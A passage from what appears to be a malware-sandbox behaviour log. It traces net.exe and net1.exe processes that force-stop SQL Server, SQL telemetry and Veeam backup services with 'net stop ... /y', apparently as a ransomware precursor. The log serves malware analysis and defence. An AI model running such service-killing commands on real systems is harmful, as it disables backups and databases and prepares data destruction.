_String2="SQLAgent$VEEAMSQL2012") returned -12 [0113.668] _wcsicmp (_String1="sess", _String2="SQLAgent$VEEAMSQL2012") returned -12 [0113.668] _wcsicmp (_String1="share", _String2="SQLAgent$VEEAMSQL2012") returned -9 [0113.668] _wcsicmp (_String1="start", _String2="SQLAgent$VEEAMSQL2012") returned 3 [0113.668] _wcsicmp (_String1="stats", _String2="SQLAgent$VEEAMSQL2012") returned 3 [0113.668] _wcsicmp (_String1="statistics", _String2="SQLAgent$VEEAMSQL2012") returned 3 [0113.668] _wcsicmp (_String1="stop", _String2="SQLAgent$VEEAMSQL2012") returned 3 [0113.668] _wcsicmp (_String1="time", _String2="SQLAgent$VEEAMSQL2012") returned 1 [0113.668] _wcsicmp (_String1="user", _String2="SQLAgent$VEEAMSQL2012") returned 2 [0113.668] _wcsicmp (_String1="users", _String2="SQLAgent$VEEAMSQL2012") returned 2 [0113.668] _wcsicmp (_String1="msg", _String2="SQLAgent$VEEAMSQL2012") returned -6 [0113.668] _wcsicmp (_String1="messenger", _String2="SQLAgent$VEEAMSQL2012") returned -6 [0113.668] _wcsicmp (_String1="receiver", _String2="SQLAgent$VEEAMSQL2012") returned -1 [0113.668] _wcsicmp (_String1="rcv", _String2="SQLAgent$VEEAMSQL2012") returned -1 [0113.668] _wcsicmp (_String1="netpopup", _String2="SQLAgent$VEEAMSQL2012") returned -5 [0113.668] _wcsicmp (_String1="redirector", _String2="SQLAgent$VEEAMSQL2012") returned -1 [0113.668] _wcsicmp (_String1="redir", _String2="SQLAgent$VEEAMSQL2012") returned -1 [0113.668] _wcsicmp (_String1="rdr", _String2="SQLAgent$VEEAMSQL2012") returned -1 [0113.668] _wcsicmp (_String1="workstation", _String2="SQLAgent$VEEAMSQL2012") returned 4 [0113.668] _wcsicmp (_String1="work", _String2="SQLAgent$VEEAMSQL2012") returned 4 [0113.668] _wcsicmp (_String1="wksta", _String2="SQLAgent$VEEAMSQL2012") returned 4 [0113.668] _wcsicmp (_String1="prdr", _String2="SQLAgent$VEEAMSQL2012") returned -3 [0113.668] _wcsicmp (_String1="devrdr", _String2="SQLAgent$VEEAMSQL2012") returned -15 [0113.668] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAgent$VEEAMSQL2012") returned -7 [0113.668] _wcsicmp (_String1="server", _String2="SQLAgent$VEEAMSQL2012") returned -12 [0113.668] _wcsicmp (_String1="svr", _String2="SQLAgent$VEEAMSQL2012") returned 5 [0113.668] _wcsicmp (_String1="srv", _String2="SQLAgent$VEEAMSQL2012") returned 1 [0113.668] _wcsicmp (_String1="lanmanserver", _String2="SQLAgent$VEEAMSQL2012") returned -7 [0113.668] _wcsicmp (_String1="alerter", _String2="SQLAgent$VEEAMSQL2012") returned -18 [0113.668] _wcsicmp (_String1="netlogon", _String2="SQLAgent$VEEAMSQL2012") returned -5 [0113.669] _wcsupr (in: _String="SQLAgent$VEEAMSQL2012" | out: _String="SQLAGENT$VEEAMSQL2012") returned="SQLAGENT$VEEAMSQL2012" [0113.669] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x28ce40 [0113.673] GetServiceKeyNameW (in: hSCManager=0x28ce40, lpDisplayName="SQLAGENT$VEEAMSQL2012", lpServiceName=0xff3f5750, lpcchBuffer=0x1ef7e8 | out: lpServiceName="", lpcchBuffer=0x1ef7e8) returned 0 [0113.674] _wcsicmp (_String1="msg", _String2="SQLAGENT$VEEAMSQL2012") returned -6 [0113.674] _wcsicmp (_String1="messenger", _String2="SQLAGENT$VEEAMSQL2012") returned -6 [0113.674] _wcsicmp (_String1="receiver", _String2="SQLAGENT$VEEAMSQL2012") returned -1 [0113.674] _wcsicmp (_String1="rcv", _String2="SQLAGENT$VEEAMSQL2012") returned -1 [0113.674] _wcsicmp (_String1="redirector", _String2="SQLAGENT$VEEAMSQL2012") returned -1 [0113.674] _wcsicmp (_String1="redir", _String2="SQLAGENT$VEEAMSQL2012") returned -1 [0113.674] _wcsicmp (_String1="rdr", _String2="SQLAGENT$VEEAMSQL2012") returned -1 [0113.674] _wcsicmp (_String1="workstation", _String2="SQLAGENT$VEEAMSQL2012") returned 4 [0113.674] _wcsicmp (_String1="work", _String2="SQLAGENT$VEEAMSQL2012") returned 4 [0113.674] _wcsicmp (_String1="wksta", _String2="SQLAGENT$VEEAMSQL2012") returned 4 [0113.674] _wcsicmp (_String1="prdr", _String2="SQLAGENT$VEEAMSQL2012") returned -3 [0113.674] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$VEEAMSQL2012") returned -15 [0113.675] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$VEEAMSQL2012") returned -7 [0113.675] _wcsicmp (_String1="server", _String2="SQLAGENT$VEEAMSQL2012") returned -12 [0113.675] _wcsicmp (_String1="svr", _String2="SQLAGENT$VEEAMSQL2012") returned 5 [0113.675] _wcsicmp (_String1="srv", _String2="SQLAGENT$VEEAMSQL2012") returned 1 [0113.675] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$VEEAMSQL2012") returned -7 [0113.675] _wcsicmp (_String1="alerter", _String2="SQLAGENT$VEEAMSQL2012") returned -18 [0113.675] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$VEEAMSQL2012") returned -5 [0113.675] NetServiceControl (in: servername=0x0, service="SQLAGENT$VEEAMSQL2012", opcode=0x0, arg=0x0, bufptr=0x1ef7f0 | out: bufptr=0x1ef7f0) returned 0x889 [0113.675] wcscpy_s (in: _Destination=0xff3f80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0113.676] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0113.676] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0113.678] GetFileType (hFile=0xb) returned 0x2 [0113.678] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ef6b8 | out: lpMode=0x1ef6b8) returned 1 [0113.678] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x1ef6b0, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x1ef6b0*=0x1e) returned 1 [0113.679] GetFileType (hFile=0xb) returned 0x2 [0113.679] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ef6b8 | out: lpMode=0x1ef6b8) returned 1 [0113.679] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef6b0, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x1ef6b0*=0x2) returned 1 [0113.679] _ultow (in: _Dest=0x889, _Radix=2029344 | out: _Dest=0x889) returned="2185" [0113.679] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff3f5b50, nSize=0x800, Arguments=0xff3f7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0113.680] GetFileType (hFile=0xb) returned 0x2 [0113.680] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ef6b8 | out: lpMode=0x1ef6b8) returned 1 [0113.680] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3f5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1ef6b0, lpReserved=0x0 | out: lpBuffer=0xff3f5b50*, lpNumberOfCharsWritten=0x1ef6b0*=0x34) returned 1 [0113.680] GetFileType (hFile=0xb) returned 0x2 [0113.680] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1ef6b8 | out: lpMode=0x1ef6b8) returned 1 [0113.681] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff3d1efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1ef6b0, lpReserved=0x0 | out: lpBuffer=0xff3d1efc*, lpNumberOfCharsWritten=0x1ef6b0*=0x2) returned 1 [0113.681] NetApiBufferFree (Buffer=0x284d60) returned 0x0 [0113.681] NetApiBufferFree (Buffer=0x28c130) returned 0x0 [0113.681] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$VEEAMSQL2012 /y" [0113.681] exit (_Code=2) Process: id = "297" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x6d892000" os_pid = "0x12a0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SQLTELEMETRY /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10729 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10730 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 10731 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10732 start_va = 0x190000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 10733 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10734 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10735 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10736 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 10737 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10738 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10739 start_va = 0x7fffffdc000 end_va = 0x7fffffdcfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 10740 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 10741 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 10742 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10743 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 798 os_tid = 0x130c Process: id = "298" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x6b3d2000" os_pid = "0xba0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "292" os_parent_pid = "0x12a4" cmd_line = "C:\\Windows\\system32\\net1 stop SQLSafeOLRService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10744 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10745 start_va = 0x30000 end_va = 0xaffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10746 start_va = 0xb0000 end_va = 0xb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000b0000" filename = "" Region: id = 10747 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 10748 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10749 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 10750 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10751 start_va = 0xff3d0000 end_va = 0xff402fff entry_point = 0xff3d0000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 10752 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 10753 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 10754 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 10755 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 10756 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 10757 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 10758 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 10759 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10760 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 10761 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10762 start_va = 0x2a0000 end_va = 0x39ffff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 10763 start_va = 0x400000 end_va = 0x40ffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 10764 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 10765 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 10766 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 10767 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 10768 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 10769 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 10770 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 10771 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 10772 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 10773 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 10774 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 10775 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 10776 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 10777 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 10778 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 10779 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 10780 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 10781 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 10944 start_va = 0x75280000 end_va = 0x75281fff entry_point = 0x75280000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 800 os_tid = 0x1318 [0113.429] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xaf9b0 | out: lpSystemTimeAsFileTime=0xaf9b0*(dwLowDateTime=0xf8c36ed0, dwHighDateTime=0x1d48689)) [0113.429] GetCurrentProcessId () returned 0xba0 [0113.429] GetCurrentThreadId () returned 0x1318 [0113.429] GetTickCount () returned 0x260e4 [0113.430] QueryPerformanceCounter (in: lpPerformanceCount=0xaf9b8 | out: lpPerformanceCount=0xaf9b8*=1816034800000) returned 1 [0113.431] GetModuleHandleW (lpModuleName=0x0) returned 0xff3d0000 [0113.431] __set_app_type (_Type=0x1) [0113.431] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff3e9c9c) returned 0x0 [0113.432] __getmainargs (in: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788, _DoWildCard=0, _StartInfo=0xff3f479c | out: _Argc=0xff3f4780, _Argv=0xff3f4790, _Env=0xff3f4788) returned 0 [0113.432] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0113.432] GetConsoleOutputCP () returned 0x1b5 [0113.726] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff3fcec0 | out: lpCPInfo=0xff3fcec0) returned 1 [0113.726] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0113.734] sprintf_s (in: _DstBuf=0xaf958, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0113.735] setlocale (category=0, locale=".437") returned="English_United States.437" [0113.738] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0113.738] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0113.738] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLSafeOLRService /y" [0113.738] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xaf6f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0113.739] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0113.739] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xaf948 | out: Buffer=0xaf948*=0x1b4d60) returned 0x0 [0113.739] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xaf948 | out: Buffer=0xaf948*=0x1bc120) returned 0x0 [0113.739] _fileno (_File=0x7fefdba2a80) returned 0 [0113.739] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0113.739] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0113.740] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0113.740] _wcsicmp (_String1="config", _String2="stop") returned -16 [0113.740] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0113.740] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0113.740] _wcsicmp (_String1="file", _String2="stop") returned -13 [0113.740] _wcsicmp (_String1="files", _String2="stop") returned -13 [0113.740] _wcsicmp (_String1="group", _String2="stop") returned -12 [0113.740] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0113.740] _wcsicmp (_String1="help", _String2="stop") returned -11 [0113.740] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0113.740] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0113.740] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0113.740] _wcsicmp (_String1="session", _String2="stop") returned -15 [0113.740] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0113.740] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0113.740] _wcsicmp (_String1="share", _String2="stop") returned -12 [0113.740] _wcsicmp (_String1="start", _String2="stop") returned -14 [0113.740] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0113.740] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0113.741] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0113.741] _wcsicmp (_String1="accounts", _String2="SQLSafeOLRService") returned -18 [0113.741] _wcsicmp (_String1="computer", _String2="SQLSafeOLRService") returned -16 [0113.741] _wcsicmp (_String1="config", _String2="SQLSafeOLRService") returned -16 [0113.741] _wcsicmp (_String1="continue", _String2="SQLSafeOLRService") returned -16 [0113.741] _wcsicmp (_String1="cont", _String2="SQLSafeOLRService") returned -16 [0113.741] _wcsicmp (_String1="file", _String2="SQLSafeOLRService") returned -13 [0113.741] _wcsicmp (_String1="files", _String2="SQLSafeOLRService") returned -13 [0113.741] _wcsicmp (_String1="group", _String2="SQLSafeOLRService") returned -12 [0113.741] _wcsicmp (_String1="groups", _String2="SQLSafeOLRService") returned -12 [0113.741] _wcsicmp (_String1="help", _String2="SQLSafeOLRService") returned -11 [0113.741] _wcsicmp (_String1="helpmsg", _String2="SQLSafeOLRService") returned -11 [0113.741] _wcsicmp (_String1="localgroup", _String2="SQLSafeOLRService") returned -7 [0113.741] _wcsicmp (_String1="pause", _String2="SQLSafeOLRService") returned -3 [0113.741] _wcsicmp (_String1="session", _String2="SQLSafeOLRService") returned -12 [0113.741] _wcsicmp (_String1="sessions", _String2="SQLSafeOLRService") returned -12 [0113.741] _wcsicmp (_String1="sess", _String2="SQLSafeOLRService") returned -12 [0113.742] _wcsicmp (_String1="share", _String2="SQLSafeOLRService") returned -9 [0113.742] _wcsicmp (_String1="start", _String2="SQLSafeOLRService") returned 3 [0113.742] _wcsicmp (_String1="stats", _String2="SQLSafeOLRService") returned 3 [0113.742] _wcsicmp (_String1="statistics", _String2="SQLSafeOLRService") returned 3 [0113.742] _wcsicmp (_String1="stop", _String2="SQLSafeOLRService") returned 3 [0113.742] _wcsicmp (_String1="time", _String2="SQLSafeOLRService") returned 1 [0113.742] _wcsicmp (_String1="user", _String2="SQLSafeOLRService") returned 2 [0113.742] _wcsicmp (_String1="users", _String2="SQLSafeOLRService") returned 2 [0113.742] _wcsicmp (_String1="msg", _String2="SQLSafeOLRService") returned -6 [0113.742] _wcsicmp (_String1="messenger", _String2="SQLSafeOLRService") returned -6 [0113.742] _wcsicmp (_String1="receiver", _String2="SQLSafeOLRService") returned -1 [0113.742] _wcsicmp (_String1="rcv", _String2="SQLSafeOLRService") returned -1 [0113.742] _wcsicmp (_String1="netpopup", _String2="SQLSafeOLRService") returned -5 [0113.742] _wcsicmp (_String1="redirector", _String2="SQLSafeOLRService") returned -1 [0113.742] _wcsicmp (_String1="redir", _String2="SQLSafeOLRService") returned -1 [0113.742] _wcsicmp (_String1="rdr", _String2="SQLSafeOLRService") returned -1 [0113.742] _wcsicmp (_String1="workstation", _String2="SQLSafeOLRService") returned 4 [0113.742] _wcsicmp (_String1="work", _String2="SQLSafeOLRService") returned 4 [0113.742] _wcsicmp (_String1="wksta", _String2="SQLSafeOLRService") returned 4 [0113.743] _wcsicmp (_String1="prdr", _String2="SQLSafeOLRService") returned -3 [0113.743] _wcsicmp (_String1="devrdr", _String2="SQLSafeOLRService") returned -15 [0113.743] _wcsicmp (_String1="lanmanworkstation", _String2="SQLSafeOLRService") returned -7 [0113.743] _wcsicmp (_String1="server", _String2="SQLSafeOLRService") returned -12 [0113.743] _wcsicmp (_String1="svr", _String2="SQLSafeOLRService") returned 5 [0113.743] _wcsicmp (_String1="srv", _String2="SQLSafeOLRService") returned 1 [0113.743] _wcsicmp (_String1="lanmanserver", _String2="SQLSafeOLRService") returned -7 [0113.743] _wcsicmp (_String1="alerter", _String2="SQLSafeOLRService") returned -18 [0113.743] _wcsicmp (_String1="netlogon", _String2="SQLSafeOLRService") returned -5 [0113.743] _wcsupr (in: _String="SQLSafeOLRService" | out: _String="SQLSAFEOLRSERVICE") returned="SQLSAFEOLRSERVICE" [0113.743] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1bce30 [0113.748] GetServiceKeyNameW (in: hSCManager=0x1bce30, lpDisplayName="SQLSAFEOLRSERVICE", lpServiceName=0xff3f5750, lpcchBuffer=0xaf868 | out: lpServiceName="", lpcchBuffer=0xaf868) returned 0 [0113.750] _wcsicmp (_String1="msg", _String2="SQLSAFEOLRSERVICE") returned -6 [0113.750] _wcsicmp (_String1="messenger", _String2="SQLSAFEOLRSERVICE") returned -6 [0113.750] _wcsicmp (_String1="receiver", _String2="SQLSAFEOLRSERVICE") returned -1 [0113.750] _wcsicmp (_String1="rcv", _String2="SQLSAFEOLRSERVICE") returned -1 [0113.750] _wcsicmp (_String1="redirector", _String2="SQLSAFEOLRSERVICE") returned -1 [0113.750] _wcsicmp (_String1="redir", _String2="SQLSAFEOLRSERVICE") returned -1 [0113.750] _wcsicmp (_String1="rdr", _String2="SQLSAFEOLRSERVICE") returned -1 [0113.750] _wcsicmp (_String1="workstation", _String2="SQLSAFEOLRSERVICE") returned 4 [0113.750] _wcsicmp (_String1="work", _String2="SQLSAFEOLRSERVICE") returned 4 [0113.750] _wcsicmp (_String1="wksta", 